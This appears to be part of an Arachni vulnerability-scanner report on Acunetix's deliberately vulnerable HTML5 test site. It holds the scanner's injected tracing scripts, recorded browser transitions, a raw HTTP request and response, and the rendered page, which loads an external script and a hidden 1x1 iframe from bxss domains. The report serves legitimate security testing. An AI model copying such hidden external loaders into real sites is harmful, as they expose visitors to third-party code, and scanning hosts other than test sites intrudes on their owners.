data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
||
| 6 | 0.800369 | click |
<a href="#/archive" data-arachni-id="916551842">
|
|
||
| 7 | 0.355032 | request |
http://testhtml5.vulnweb.com/static/app/partials/archive.html |
|
||
| 8 | 0.250829 | request |
http://testhtml5.vulnweb.com/ajax/archive |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Cache-Control: no-cache Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="55824100"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class=""><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li class="active"><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> Showing last <b>50</b> items </div> </div> <!-- ngRepeat: item in items | filter:searchText --><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> blog.github.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> ssd.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> www.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> twitter.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> <hr> </div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
